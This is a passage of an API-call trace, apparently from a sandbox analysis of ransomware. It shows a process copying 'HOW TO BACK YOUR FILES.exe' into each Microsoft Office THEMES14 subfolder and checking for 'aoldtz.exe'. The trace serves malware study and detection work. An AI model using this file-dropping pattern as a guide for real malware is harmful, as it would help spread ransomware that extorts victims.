Files\\Microsoft Shared\\THEMES14\\PROFILE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE" [0075.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0b78 | out: hHeap=0x2b0000) returned 1 [0075.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2820 | out: hHeap=0x2b0000) returned 1 [0075.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned 63 [0075.229] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE" [0075.229] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.229] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.234] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.234] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e57d980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e57d980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.234] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.234] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.235] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL" [0075.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0af0 | out: hHeap=0x2b0000) returned 1 [0075.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2800 | out: hHeap=0x2b0000) returned 1 [0075.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned 61 [0075.235] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL" [0075.235] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.235] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.239] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e5a3ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e5a3ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.239] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.239] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS" [0075.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0a68 | out: hHeap=0x2b0000) returned 1 [0075.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27e0 | out: hHeap=0x2b0000) returned 1 [0075.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned 63 [0075.239] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS" [0075.239] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.239] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.244] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.244] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e5a3ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e5a3ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.245] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.245] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.245] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK" [0075.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f09e0 | out: hHeap=0x2b0000) returned 1 [0075.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27c0 | out: hHeap=0x2b0000) returned 1 [0075.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned 63 [0075.245] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK" [0075.245] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.245] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.249] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.249] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e5a3ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e5a3ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.249] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.249] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.250] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL" [0075.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0958 | out: hHeap=0x2b0000) returned 1 [0075.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27a0 | out: hHeap=0x2b0000) returned 1 [0075.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned 61 [0075.250] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL" [0075.250] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.250] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.283] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e615f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e615f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.284] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.284] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.284] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS" [0075.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2b0000) returned 1 [0075.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2780 | out: hHeap=0x2b0000) returned 1 [0075.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned 62 [0075.284] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS" [0075.284] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.284] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.288] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.288] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e615f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e615f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.288] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.288] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.289] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL" [0075.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0848 | out: hHeap=0x2b0000) returned 1 [0075.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0075.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned 63 [0075.289] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL" [0075.289] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.289] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.338] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.338] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e688320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e688320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.338] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.338] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.338] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS" [0075.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0075.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0075.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned 60 [0075.338] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS" [0075.338] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.338] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.360] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.360] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6ae480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6ae480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.361] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.361] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.361] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST" [0075.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f06b0 | out: hHeap=0x2b0000) returned 1 [0075.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2720 | out: hHeap=0x2b0000) returned 1 [0075.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned 62 [0075.361] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST" [0075.361] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.361] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.366] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.366] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6d45e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6d45e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.366] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.366] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.367] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE" [0075.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0075.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0075.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned 59 [0075.367] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE" [0075.367] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.367] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.370] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6d45e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6d45e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.370] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.370] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.370] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN" [0075.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0075.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0075.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned 64 [0075.371] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN" [0075.371] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.371] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.376] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e6d45e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6d45e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.376] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.376] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN" [0075.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0075.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26c0 | out: hHeap=0x2b0000) returned 1 [0075.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned 64 [0075.376] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned="C:\\Program 